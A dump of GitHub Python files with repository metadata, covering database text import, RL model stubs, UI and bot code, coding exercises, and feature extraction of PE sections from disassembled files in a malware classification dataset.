text.split('\\n')[0], text.split('\\n')[-1]\n\n return title, text, created_date\n\n def clean_data(self, raw_text):\n \"\"\"\n This method cleans the extracted raw text data. It removes leading and trailing whitespaces,\n reduces multiple newlines to two, and reduces multiple whitespaces to one.\n\n :param raw_text: A string representing the raw text data to clean.\n :returns: A string representing the cleaned text data.\n \"\"\"\n raw_text = raw_text.strip()\n\n raw_text = re.sub(r'\\n{3,}', '\\n\\n', raw_text)\n raw_text = re.sub(r'\\s{2,}', ' ', raw_text)\n\n return raw_text\n\n def insert_or_update_record(self, record_data):\n \"\"\"\n This method inserts a new record or updates an existing one in the database.\n\n :param record_data: A dictionary containing the record data.\n \"\"\"\n sql = \"\"\"\n INSERT INTO records (source_id, id, title, text, page_num, created_date)\n VALUES (%s, %s, %s, %s, %s, %s)\n ON DUPLICATE KEY UPDATE\n title = VALUES(title),\n text = VALUES(text),\n page_num = VALUES(page_num),\n created_date = VALUES(created_date)\n \"\"\"\n val = (record_data['source_id'], record_data['id'], record_data['title'], record_data['text'],\n record_data['page_num'], record_data['created_date'])\n\n try:\n self.cursor.execute(sql, val)\n self.mydb.commit()\n except mysql.connector.Error as err:\n print(f\"Something went wrong with the SQL execution: {err}\")\n\n def close_db_connection(self):\n \"\"\"\n This method closes the connection to the MySQL database.\n \"\"\"\n try:\n self.cursor.close()\n self.mydb.close()\n print(\"Database connection closed.\")\n except mysql.connector.Error as err:\n print(f\"Something went wrong when closing the database connection: {err}\")\n \n def write_cleaned_file(self, file, text):\n \"\"\"\n This method writes the cleaned text to a new file in the destination folder.\n\n :param file: A string representing the filename.\n :param text: A string representing the cleaned text.\n \"\"\"\n cleaned_file = os.path.join(self.dest_folder, file)\n\n with open(cleaned_file, 'w') as f:\n f.write(text)\n\n\n\n","repo_name":"alantmiller/text-import-project","sub_path":"src/text_file_processor.py","file_name":"text_file_processor.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30479111736","text":"from sandbox.rocky.tf.core.network import MLP\n\nimport tensorflow as tf\nimport numpy as np\nfrom rllab.core.serializable import Serializable\nfrom sandbox.rocky.tf.core.layers_powered import LayersPowered\nfrom sandbox.rocky.tf.misc import tensor_utils\nfrom rllab.misc import logger\nfrom collections import OrderedDict\nimport sandbox.rocky.tf.core.layers as L\nfrom sandbox.ours.dynamics import MLPDynamicsModel\nimport time\n\n\nclass PointEnvFakeModelEnsemble(Serializable):\n \"\"\"\n Class for MLP continous dynamics model\n \"\"\"\n\n def __init__(self, env_spec, num_models=5, error_range_around_goal=0.5, bias_range=0.05, error_std=0.01, goal=(0,0),\n error_at_goal=False, smooth_error=False, **kwargs):\n self.num_models = num_models\n self.env_spec = env_spec\n self.obs_space_dims = 2\n self.action_space_dims = 2\n self.error_range_around_goal = error_range_around_goal\n self.bias_range = bias_range\n self.error_std = error_std\n self.goal = np.asarray(goal)\n self.error_at_goal = error_at_goal\n self.smooth_error = smooth_error\n\n Serializable.quick_init(self, locals())\n\n self.model_biases = np.random.uniform(-self.bias_range, self.bias_range,\n size=(self.obs_space_dims, self.num_models))\n\n def fit(self, obs, act, obs_next, epochs=1000, compute_normalization=True, valid_split_ratio=None, rolling_average_persitency=None, verbose=False, log_tabular=False):\n \"\"\"\n Fits the NN dynamics model\n :param obs: observations - numpy array of shape (n_samples, ndim_obs)\n :param act: actions - numpy array of shape (n_samples, ndim_act)\n :param obs_next: observations after taking action - numpy array of shape (n_samples, ndim_obs)\n :param epochs: number of training epochs\n :param compute_normalization: boolean indicating whether normalization shall be (re-)computed given the data\n :param valid_split_ratio: relative size of validation split (float between 0.0 and 1.0)\n :param (boolean) whether to log training stats in tabular format\n :param verbose: logging verbosity\n \"\"\"\n assert obs.ndim == 2 and obs.shape[1] == self.obs_space_dims\n assert obs_next.ndim == 2 and obs_next.shape[1] == self.obs_space_dims\n assert act.ndim == 2 and act.shape[1] == self.action_space_dims\n\n self.model_biases = np.random.uniform(-self.bias_range, self.bias_range, size=(self.obs_space_dims, self.num_models))\n\n def predict(self, obs, act, pred_type='rand'):\n \"\"\"\n Predict the batch of next observations given the batch of current observations and actions\n :param obs: observations - numpy array of shape (n_samples, ndim_obs)\n :param act: actions - numpy array of shape (n_samples, ndim_act)\n :param pred_type: prediction type\n - rand: choose one of the models randomly\n - mean: mean prediction of all models\n - all: returns the prediction of all the models\n :return: pred_obs_next: predicted batch of next observations -\n shape: (n_samples, ndim_obs) - in case of 'rand' and 'mean' mode\n (n_samples, ndim_obs, n_models) - in case of 'all' mode\n \"\"\"\n assert obs.shape[0] == act.shape[0]\n assert obs.ndim == 2 and obs.shape[1] == self.obs_space_dims\n assert act.ndim == 2 and act.shape[1] == self.action_space_dims\n\n obs_original = obs\n\n true_delta = np.tile(np.expand_dims(np.clip(act, -0.1, 0.1), 2), (1, 1, self.num_models)) # true point env delta\n\n delta_error = self._delta_error(obs)\n delta = true_delta + delta_error\n\n assert delta.ndim == 3\n\n pred_obs = obs_original[:, :, None] + delta\n\n batch_size = delta.shape[0]\n if pred_type == 'rand':\n # randomly selecting the prediction of one model in each row\n idx = np.random.randint(0, self.num_models, size=batch_size)\n pred_obs = np.stack([pred_obs[row, :, model_id] for row, model_id in enumerate(idx)], axis=0)\n elif pred_type == 'mean':\n pred_obs = np.mean(pred_obs, axis=2)\n elif pred_type == 'all':\n pass\n else:\n NotImplementedError('pred_type must be one of [rand, mean, all]')\n return pred_obs\n\n def predict_model_batches(self, obs_batches, act_batches):\n \"\"\"\n Predict the batch of next observations for each model given the batch of current observations and actions for each model\n :param obs_batches: observation batches for each model concatenated along axis 0 - numpy array of shape (batch_size_per_model * num_models, ndim_obs)\n :param act_batches: action batches for each model concatenated along axis 0 - numpy array of shape (batch_size_per_model * num_models, ndim_act)\n :return: pred_obs_next_batch: predicted batch of next observations -\n shape: (batch_size_per_model * num_models, ndim_obs)\n \"\"\"\n assert obs_batches.shape[0] == act_batches.shape[0] and obs_batches.shape[0] % self.num_models == 0\n assert obs_batches.ndim == 2 and obs_batches.shape[1] == self.obs_space_dims\n assert act_batches.ndim == 2 and act_batches.shape[1] == self.action_space_dims\n\n pred_obs_model_stacked = self.predict(obs_batches, act_batches, pred_type='all')\n pred_obs_batches = np.concatenate([pred_obs_split[:, :, i] for i, pred_obs_split in enumerate(np.vsplit(pred_obs_model_stacked, self.num_models))], axis=0)\n\n assert pred_obs_batches.shape == obs_batches.shape\n return pred_obs_batches\n\n def _delta_error(self, obs):\n\n if self.smooth_error:\n distances = np.linalg.norm(obs - self.goal[None, :], axis=1)\n normalized_distances = distances / np.max(distances)\n\n error_mask = (1-normalized_distances)**2 if self.error_at_goal else normalized_distances**2\n else:\n if self.error_at_goal:\n error_mask = (np.linalg.norm(obs-self.goal[None, :], axis=1) < self.error_range_around_goal).astype(np.float32)\n else:\n error_mask = (np.linalg.norm(obs - self.goal[None, :], axis=1) > self.error_range_around_goal).astype(\n np.float32)\n error_mask = np.tile(error_mask.reshape((obs.shape[0], 1, 1)), (1, obs.shape[1],self.num_models))\n\n delta_error = np.random.normal(loc=self.model_biases, scale=self.error_std, size=obs.shape + (self.num_models,))\n\n # mask out delta error in certain regions\n delta_error = np.multiply(error_mask, delta_error)\n\n assert delta_error.shape == obs.shape + (self.num_models,)\n return delta_error\n\n def predict_std(self, obs, act):\n \"\"\"\n calculates the std of predicted next observations among the models\n given the batch of current observations and actions\n :param obs: observations - numpy array of shape (n_samples, ndim_obs)\n :param act: actions - numpy array of shape (n_samples, ndim_act)\n :return: std_pred_obs: std of predicted next observatations - (n_samples, ndim_obs)\n \"\"\"\n assert self.num_models > 1, \"calculating the std requires at \"\n pred_obs = self.predict(obs, act, pred_type='all')\n assert pred_obs.ndim == 3\n return np.std(pred_obs, axis=2)\n\n def reinit_model(self):\n pass\n\n","repo_name":"jonasrothfuss/model_ensemble_meta_learning","sub_path":"experiments/run_scripts/policy_plasticity/point_env_fake_model_ensemble.py","file_name":"point_env_fake_model_ensemble.py","file_ext":"py","file_size_in_byte":7550,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"81"} +{"seq_id":"36238503960","text":"import c4d\nimport os\nimport sys\nimport importlib\n\nSCRIPTPATH = os.path.dirname(__file__)\nLib_Path = os.path.dirname(os.path.dirname(SCRIPTPATH))\n\nif Lib_Path not in sys.path:\n sys.path.append(Lib_Path)\n\n\nimport ualib\nimportlib.reload(ualib)\nimportlib.reload(ualib.utils)\nfrom ualib.core import *\n\n\n\nclass G4D_Test_MainDlg(c4d.gui.GeDialog):\n\n ID_GROUP_NONE = 1000\n ID_Group_Scroll = 1001\n\n def __init__(self):\n self.AUA = AdvanceUserArea()\n self.AUA.draw_debug_frames = False\n\n root = self.AUA\n\n # 三层 rect\n parent = root\n item = RectItem(position=Vector(10), size=Vector(300,200))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n parent = item\n item = RectItem(position=Vector(40), size=Vector(100,100))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n parent = item\n item = RectItem(position=Vector(50), size=Vector(80,80))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # SimpelTextItem\n parent = root\n item = SimpelTextItem(text=\"SimpelTextItem\", position=Vector(340,10))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # ClipMapTextItem\n parent = root\n item = ClipMapTextItem(text=\"ClipMapTextItem\", font_size=72, position=Vector(10,220))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # BitmapItem\n BMP = ualib.utils.get_bitmap_from(r\"G:\\灵感\\celeste.jpg\")\n parent = root\n item = BitmapItem(bmp=BMP, position=Vector(10,320), size=Vector(300,200))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # BaseBezierItem\n parent = root\n item = BaseBezierItem(position=Vector(340,40), size=Vector(20))\n item.add_bezier_object(start=Vector(0), end=Vector(100) ,start_hand_offset=Vector(100,0), end_hand_offset=Vector(-100,0), update=True)\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # RoundRectItem\n parent = root\n item = RoundRectItem(position=Vector(320,320), size=Vector(100))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # RoundRectItem\n parent = root\n item = RoundRectItem(position=Vector(440,320), size=Vector(100), radius=50)\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # RoundRectItem\n parent = root\n item = RoundRectItem(position=Vector(440,420), size=Vector(100), radius=50)\n item.prop[\"moveable\"] = True\n item.set_seperate_radius(lt=12, rt=22, rb=32, lb=52)\n item.insert_under(parent)\n # RoundRectItem\n parent = root\n item = RoundRectItem(position=Vector(440,520), size=Vector(100, 50), radius=50)\n item.prop[\"moveable\"] = True\n item.set_seperate_radius(lt=20, rt=20, rb=0, lb=0)\n item.insert_under(parent)\n\n def CreateLayout(self):\n self.SetTitle(\"ualibe TEST\")\n if self.GroupBegin(self.ID_GROUP_NONE, c4d.BFH_SCALEFIT| c4d.BFV_SCALEFIT, cols=1, rows=0, title=\"\", groupflags=0, initw=0, inith=0):\n self.GroupBorderSpace(10, 5, 10, 10)\n self.AddCheckbox(200, c4d.BFH_SCALEFIT, 0,0, \"show debug frame\")\n if self.ScrollGroupBegin(self.ID_Group_Scroll, c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT, scrollflags=c4d.SCROLLGROUP_VERT | c4d.SCROLLGROUP_AUTOVERT):\n self.AddUserArea(100, c4d.BFH_SCALEFIT| c4d.BFV_SCALEFIT, initw=0, inith=0)\n self.AttachUserArea( self.AUA.ua, 100)\n self.GroupEnd()\n self.GroupEnd()\n return True\n\n def InitValues(self):\n return True\n\n def Command(self, id, msg):\n if id == 200:\n self.AUA.draw_debug_frames = self.GetBool(id)\n self.AUA.set_redraw()\n return True\n\n def Message(self, msg, result):\n return c4d.gui.GeDialog.Message(self, msg, result)\n\n\n\nif __name__ == '__main__':\n dialog = G4D_Test_MainDlg()\n dialog.Open(c4d.DLG_TYPE_ASYNC, pluginid=0, xpos=-2, ypos=-2, defaultw=800, defaulth=800, subid=0)","repo_name":"DunHouGo/Boghma-Plugin-HUB","sub_path":"boghma hub/libs/boghma/ualib/test/test_jack_000_basic creat.py","file_name":"test_jack_000_basic creat.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"81"} +{"seq_id":"18843481773","text":"name=\"Mark\"\nsurname=\"Zuckerberg\"\nprint(\"{} {}\".format(name, surname))\n#меняем местами имя и фамилию\nprint(\"{} {}\".format(surname, name))\n\nperson_name = \"Mark Zuckerberg\"\nname, surname = person_name.split(\" \")\nnew_person_name = \"{} {}\".format(surname, name)\nprint(person_name)\nprint(new_person_name)\n\n#задание7\namerican_date = \"05.17.2016\"\nmonth = int(american_date[:2])\nday = int(american_date[3:5])\nyear = int(american_date[6:])\neuropean_date = \"{}.{}.{}\".format(day, month, year)\nprint(american_date)\nprint(european_date)\n\n#задание9\nsnake_case = \"employee_first_name\"\nnew = snake_case.split(\"_\")\ncamelcase = new[0].capitalize()+new[1].capitalize()+new[2].capitalize()\nprint(snake_case)\nprint(camelcase)\n\n#задание10\nwriter = \"Leo Tolstoy*1828-08-28*1910-11-20\"\n#writer = \"Marcus Aurelius*121-04-26*180-03-17\"\nname, date1, date2 = writer.split(\"*\")\ndate_of_birth = date1.split(\"-\")\ndate_of_death = date2.split(\"-\")\nage = int(date_of_death[0])-int(date_of_birth[0])\nprint(\"{}, {}\".format(name,age))\n\n\n\n\n\n\n\n\n","repo_name":"Lera87/homework1","sub_path":"homework 7-10.py","file_name":"homework 7-10.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73387007626","text":"from urllib.parse import parse_qs\n\nfrom loguru import logger\n\nfrom app.db import Session\nfrom app.services.dictinary import StatusService\nfrom app.services.form_review import FormService\nfrom app.services.review import ReviewPeriodService\nfrom app.services.user import UserService\nfrom app.tbot.storages import ROUTES, COMMANDS, PERMISSIONS\n\n\ndef add_user(message):\n \"\"\" Добавить пользователя в сообщение \"\"\"\n chat_id = str(message.chat.id)\n user_service = UserService()\n answer = user_service.is_exist(chat_id=chat_id)\n if answer:\n user = user_service.by_chat_id(chat_id=chat_id)\n message.user = \\\n {\n 'is_new': not answer,\n 'is_exist': True,\n 'pk': user.id,\n 'role': user.role.name,\n 'have_boss': True if user.boss else False,\n 'boss': user.boss.username if user.boss else None,\n }\n else:\n message.user = {\n 'is_exist': False\n }\n\n\ndef check_permission(bot, message):\n if message.text:\n if message.user['is_exist']:\n if message.user['role'] == 'Undefined':\n message.command = 'start'\n bot.send_message(message.chat.id, 'Дождитесь окончания регистрации')\n elif message.command not in PERMISSIONS[message.user['role']]:\n message.command = 'wrong'\n elif message.text.replace('/', '') in COMMANDS.keys():\n message.is_exist = True\n message.command = 'start'\n else:\n message.command = 'start'\n\n\ndef add_review_period(message):\n \"\"\" Добавить review преиод \"\"\"\n service = ReviewPeriodService()\n answer = service.is_now\n message.review_period = \\\n {\n 'is_active': answer,\n 'pk': service.current.id if answer else None\n }\n\n\ndef add_form(message):\n \"\"\" Добавить форму \"\"\"\n form_service = FormService()\n if message.review_period['is_active'] and message.user['is_exist']:\n review_period_pk = message.review_period['pk']\n if form_service.is_exist(user_id=message.user['pk'], review_period_id=review_period_pk):\n form = form_service.by(user_id=message.user['pk'], review_period_id=review_period_pk)\n else:\n status_service = StatusService()\n status = status_service.write_in\n form = form_service.create(user_id=message.user['pk'],\n review_period_id=review_period_pk, status=status)\n Session().commit()\n\n message.form = \\\n {\n 'is_exist': True,\n 'is_full': False,\n 'pk': form.id,\n 'status': form.status.name,\n }\n else:\n message.form = \\\n {\n 'is_exist': False\n }\n\n\ndef log_command(message):\n \"\"\" Логировать действия пользователей \"\"\"\n user = message.user\n if message.user['is_exist'] and message.text:\n logger.debug(f'\\nUSER {user} COMMAND: {message.command}')\n\n\ndef log_callback(call):\n try:\n args = call.message.args\n except AttributeError:\n args = ''\n user = call.message.user\n logger.debug(f'\\nUSER {user} URL: {call.url} ARGS: {args}')\n\n\ndef log_unknown(message):\n \"\"\" Логировать неизвестного пользователя \"\"\"\n logger.debug(f'ЗАПРОС ОТ CHAT_ID: {message.chat.id}\\nMESSAGE:\\n{message.text}')\n\n\ndef log_bot(message):\n \"\"\" Логировать действия бота \"\"\"\n user = message.user\n logger.debug(\n f'\\nUSER {user} CHAT_ID: {message.chat.id}\\nBOT_CALLBACK_MESSAGE:\\n{message.text}')\n\n\ndef parse_command(bot_instance, message):\n \"\"\" Запарсить команду и поместить её объект сообщения\"\"\"\n if message.text:\n if message.user['is_exist']:\n message.command = message.text.replace('/', '')\n message.is_exist = message.command in COMMANDS.keys()\n elif message.text.replace('/', '') in COMMANDS.keys():\n message.is_exist = True\n message.command = 'start'\n else:\n message.is_exist = False\n else:\n message.is_exist = False\n\n\ndef parse_url(bot_instance, call):\n \"\"\" Запарсить URL callback с аргумантами и поместить их в обзъект сообщения\"\"\"\n # if call.message.user['is_exist']:\n if ':' in call.data: # TODO: решить проблему с сепаратором\n args = {'calendar': call.data}\n if '|' in call.data:\n args['cb'], args['first_date'] = call.data.split(':')[0].split('|')\n else:\n args['cb'] = call.data.split(':')[0]\n args['call'] = call\n call.url = args['cb']\n else:\n args = parse_qs(call.data)\n call.url = args['cb'][0]\n\n call.message.args = args\n call.is_exist = call.url in ROUTES.keys()\n # else:\n # call.url = 'auth'\n\n\n__all__ = \\\n [\n 'add_user',\n 'add_review_period',\n 'add_form',\n 'log_callback',\n 'log_command',\n 'log_unknown',\n 'log_bot',\n 'parse_url',\n 'parse_command',\n 'check_permission'\n ]\n","repo_name":"gagpa/PerformanceReview__mark","sub_path":"app/tbot/middlewares/generals_middlewares.py","file_name":"generals_middlewares.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4092371728","text":"import os\nfrom PIL import Image\n\nimport torch\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\n\nclass FIW300(Dataset):\n '''\n 300W Dataset class\n\n '''\n\n def __init__(self, data_dir, indoor=True, outdoor=True, size=(224, 224)):\n assert indoor or outdoor, 'Indoor and outdoor cannot be both set to False.'\n self.size = size\n self.config = {\n 'indoor': (os.path.join(data_dir, '01_Indoor'), indoor),\n 'outdoor': (os.path.join(data_dir, '02_Outdoor'), outdoor)\n }\n\n self.paths = self._get_paths()\n self.transform = transforms.Compose([\n transforms.Grayscale(1),\n transforms.Resize(size),\n transforms.ToTensor(),\n ])\n\n def _get_paths(self):\n '''\n Get paths to files\n\n Parameters\n ----------\n None\n \n Returns\n -------\n data: list\n of the form [(img_path, pts_path), ...]\n\n '''\n\n img_paths, pts_paths = [], []\n for env in ['indoor', 'outdoor']:\n env_dir, env_flag = self.config[env]\n\n if env_flag:\n for f_name in os.listdir(env_dir):\n if 'png' in f_name:\n img_paths.append(os.path.join(env_dir, f_name))\n elif 'pts' in f_name:\n pts_paths.append(os.path.join(env_dir, f_name))\n\n img_paths.sort()\n pts_paths.sort()\n paths = list(zip(img_paths, pts_paths))\n return paths\n\n def _get_pts(self, pts_path):\n with open(pts_path) as f:\n lines = [line.strip() for line in f]\n head, tail = lines.index('{')+1, lines.index('}')\n points = lines[head:tail]\n\n pts = [\n tuple([float(point) for point in point.split()]) \n for point in points\n ]\n \n return pts\n\n def _normalize_pts(self, pts, w, h):\n return [(x/w, y/h) for x, y in pts]\n\n def __len__(self):\n return len(self.paths)\n\n def __getitem__(self, i):\n img_path, pts_path = self.paths[i]\n img = Image.open(img_path)\n w, h = img.width, img.height\n img = self.transform(img)\n\n pts = self._get_pts(pts_path)\n pts = self._normalize_pts(pts, w, h)\n pts = torch.Tensor(pts).view(136)\n\n return img, pts","repo_name":"cheulyop/pytorch-facial_landmark_detection","sub_path":"codes/utils/FIW300.py","file_name":"FIW300.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27441259765","text":"from runners.helpful_fn import CheckPandigital\n\ndef p032():\n print(\"Pandigital products\")\n p = set() \n for i in range(2, 80):\n start = 1234 if i < 10 else 123 \n for j in range(start, 10000//i):\n # check the mulipand the muliplier and the product\n if CheckPandigital(str(i) + str(j) + str(i*j)):\n p.add(i*j)\n print(f\"the pandigital numbers: {p}\")\n return(f\"p032 Ans: {sum(p)}\")","repo_name":"MAshrafM/ProjectEuler","sub_path":"p032/p032.py","file_name":"p032.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19723439948","text":"from sqlalchemy import create_engine, Column, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nfrom schemas.categories import Category\n\nBase = declarative_base()\n\nclass TableCategory(Base):\n __tablename__ = \"categories\"\n\n id = Column(\"id\", String, primary_key=True)\n title = Column(\"title\", String)\n color_id = Column(\"color_id\", String)\n creator_id = Column(\"creator_id\", String)\n\n def __init__(self, id, title, color_id, creator_id):\n self.id = id\n self.title = title\n self.color_id = color_id\n self.creator_id = creator_id\n\nengine = create_engine(\"sqlite:///db/db/categories.db\")\nBase.metadata.create_all(bind=engine)\n\nsession = sessionmaker(bind=engine)()\n\ndef convert_to_category(category: TableCategory) -> Category:\n return Category(\n id=category.id,\n title=category.title,\n color_id=category.color_id,\n creator_id=category.creator_id\n )\n\ndef convert_to_table_category(category: Category) -> TableCategory:\n return TableCategory(\n id=category.id,\n title=category.title,\n color_id=category.color_id,\n creator_id=category.creator_id\n )\n\ndef get_categories() -> list[Category]:\n query = session.query(TableCategory).all()\n categories = []\n for category in query:\n if category != None: categories.append(convert_to_category(category))\n return categories\n\ndef find_category(id: str) -> Category:\n query = session.query(TableCategory).get(id)\n if query == None: return None\n category = convert_to_category(query)\n return category\n\ndef add_category(category: Category) -> Category:\n session.add(convert_to_table_category(category))\n session.commit()\n return category\n\ndef change_category(category: Category) -> Category:\n query = session.query(TableCategory).get(category.id)\n if query == None: return None\n query.title = category.title\n query.color_id = category.color_id\n\n session.commit()\n return category\n\ndef delete_category(category_id: str) -> str:\n query = session.query(TableCategory).get(category_id)\n if query == None: return None\n session.delete(query)\n\n session.commit()\n return category_id","repo_name":"maksim4k1/multi-tasker-api","sub_path":"db/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20991261071","text":"\"\"\"\n给定一个二叉树,返回其节点值自底向上的层次遍历。 (即按从叶子节点所在层到根节点所在的层,逐层从左向右遍历)\n\n例如:\n给定二叉树 [3,9,20,null,null,15,7],\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n返回其自底向上的层次遍历为:\n\n[\n [15,7],\n [9,20],\n [3]\n]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/binary-tree-level-order-traversal-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def levelOrderBottom(self, root: TreeNode):\n # 48ms 14.5MB\n # 最后翻转一下就好\n if not root:\n return []\n\n result = []\n tmp_node = [root]\n while tmp_node:\n tmp, node_list = [], []\n for node in tmp_node:\n tmp.append(node.val)\n if node.left:\n node_list.append(node.left)\n if node.right:\n node_list.append(node.right)\n\n result.append([tmp])\n tmp_node = node_list\n\n return result.reverse()\n","repo_name":"flashlightli/math_question","sub_path":"leetcode_question/easy_question/107_Binary_Tree_Level_Order_Traversal_II.py","file_name":"107_Binary_Tree_Level_Order_Traversal_II.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20402032713","text":"from util import *\n\nimport sys\nimport pandas as pd\nimport re\nimport gzip\nimport subprocess\n\n# load configuration file\ndataset_dir, trainLabels = load_config('config.yml') \n\n\n# The list below contains all the reserved sections related to PE format\n# described explicitly in the official Microsoft Docs:\n# https://docs.microsoft.com/en-us/windows/desktop/Debug/pe-format#special-sections\n# Additional sections used by compiler optimizations are added aswell:\n# https://software.intel.com/en-us/forums/intel-c-compiler/topic/538478\npe_sections = ['.bss', '.cormeta', '.data', '.debug$F', '.debug$P',\n '.debug$P', '.debug$S', '.debug$T', '.drective', '.edata',\n '.idata', '.idlsym', '.pdata', '.reloc', '.rsrc', '.sbss',\n '.sdata', '.srdata', '.sxdata', '.text', '.tls', '.tls$',\n '.vsdata', '.xdata', '.rdata', '.orpc', '.data1', '.text1',\n '_RDATA', '.debug_o', 'HEADER', 'DATA', 'CODE', 'BSS']\n\n\n# Function that extracts all the sections appearing in the whole group of .asm files\n# in Microsoft's Malware Competition. To ensure semantic value of those sections, we\n# assert that those sections discovered are valid sections of the PE format.\n# Returns a list of all different valid sections appearing in .asm files provided\ndef extract_legit_sections(files_list):\n total_files = len(files_list) \n sections_set = set()\n for idx, file_name in enumerate(files_list):\n asm_file = dataset_dir + 'train/' + file_name + '.asm.gz'\n try:\n # encoding of .asm files produced by IDA Pro is ISO-8859-1\n with gzip.open(asm_file, 'rt', encoding='ISO-8859-1') as fp:\n for line in fp.readlines():\n # section name is the first field before ':' in every line\n # and is converted to lower case for data homogeneity\n section_name = line.split(':')[0]\n sections_set.add(section_name)\n except Exception as e:\n log_exception(e, sys.argv[0], asm_file)\n # just to make it fancy\n progress_bar(idx+1, total_files, 50)\n\n # TODO: for further examination\n save_obj(sections_set, 'sections_interim')\n # intersect the valid PE format sections and the sections that appeared in the .asm files\n # in order to consider only valid sections with actual value\n sections_final = sections_set.intersection(set(pe_sections))\n sections_final = list(sections_final)\n save_obj(sections_final, 'sections')\n return sections_final\n\n\n# Feature extraction implemented using UNIX's grep command for faster\n# extraction. Function returns all sections with an available virtual\n# and raw section size.\ndef extract_vsrs_sections(files_list):\n vsrs_sections = set()\n total_files = len(files_list)\n for idx, file_name in enumerate(files_list):\n asm_file = dataset_dir + 'train/' + file_name + '.asm.gz'\n proc_vs = subprocess.run(['zgrep', 'Virtual size', asm_file], stdout=subprocess.PIPE)\n proc_ss = subprocess.run(['zgrep', 'Section size', asm_file], stdout=subprocess.PIPE)\n output_vs = proc_vs.stdout.decode('ISO-8859-1')\n output_ss = proc_ss.stdout.decode('ISO-8859-1')\n sect_vs_list = []; sect_ss_list = []\n for line in output_vs.split('\\n')[:-1]:\n section_name = line.split(':')[0]\n # extract virtual size using REGEX (refer to IDA .asm generated file format)\n regexp_vs = re.search('\\(\\s*(\\d+)\\.\\)', line)\n if regexp_vs:\n sect_vs = int(regexp_vs.group(1))\n sect_vs_list.append(section_name)\n for line in output_ss.split('\\n')[:-1]:\n section_name = line.split(':')[0]\n # extract raw size using REGEX (refer to IDA .asm generated file format)\n regexp_ss = re.search('\\(\\s*(\\d+)\\.\\)', line)\n if regexp_ss:\n sect_ss = int(regexp_ss.group(1))\n sect_ss_list.append(section_name)\n\n # section should be considered 'legit' only if both virtual size and raw section\n # size is provided is the .asm file\n inter_set = set(sect_vs_list).intersection(set(sect_ss_list))\n vsrs_sections = vsrs_sections.union(inter_set)\n progress_bar(idx+1, total_files, 50)\n\n save_obj(list(vsrs_sections), 'vsrs_sections')\n return list(vsrs_sections)\n\n\n# Sections information extraction using unix commands to speed-up the process\ndef extract_sections_info(sect_dict, files_list):\n # extract_vsrs_sections() must be executed prior to this command\n vsrs_set = set(load_obj('vsrs_sections'))\n vsrs_sections = list(vsrs_set.intersection(set(pe_sections)))\n # extract_legit_sections() must be executed prior to this command\n legit_sections = load_obj('sections')\n total_files = len(files_list)\n for idx, file_name in enumerate(files_list):\n for key in sect_dict:\n sect_dict[key].append(0)\n asm_file = dataset_dir + 'train/' + file_name + '.asm.gz'\n lines_proc = subprocess.run(['zgrep', '-c', '^', asm_file], stdout=subprocess.PIPE)\n total_lines = int(lines_proc.stdout.decode('ISO-8859-1').strip())\n for section in legit_sections:\n # extract lines of the specific section\n grep_regex = '^\\\\' + section + ':'\n proc = subprocess.run(['zgrep', '-c', grep_regex, asm_file], stdout=subprocess.PIPE)\n sect_lines = int(proc.stdout.decode('ISO-8859-1').strip())\n sect_dict[section + '_linesperc'][idx] = float(sect_lines)/total_lines\n\n proc_vs = subprocess.run(['zgrep', 'Virtual size', asm_file], stdout=subprocess.PIPE)\n proc_ss = subprocess.run(['zgrep', 'Section size', asm_file], stdout=subprocess.PIPE)\n output_vs = proc_vs.stdout.decode('ISO-8859-1')\n output_ss = proc_ss.stdout.decode('ISO-8859-1')\n for line in output_vs.split('\\n')[:-1]:\n section_name = line.split(':')[0]\n if section_name not in vsrs_sections:\n continue\n # extract virtual size using REGEX (refer to IDA .asm generated file format)\n regexp_vs = re.search('\\(\\s*(\\d+)\\.\\)', line)\n if regexp_vs:\n sect_vs = int(regexp_vs.group(1))\n sect_dict[section_name + '_vs'][idx] = sect_vs\n \n total_vs = sum(sect_dict[s + '_vs'][idx] for s in vsrs_sections)\n if total_vs != 0:\n for section in vsrs_sections:\n sect_dict[section + '_vsperc'][idx] = float(sect_dict[section + '_vs'][idx])/total_vs\n \n for line in output_ss.split('\\n')[:-1]:\n section_name = line.split(':')[0]\n if section_name not in vsrs_sections:\n continue\n # extract raw size using REGEX (refer to IDA .asm generated file format)\n regexp_ss = re.search('\\(\\s*(\\d+)\\.\\)', line)\n if 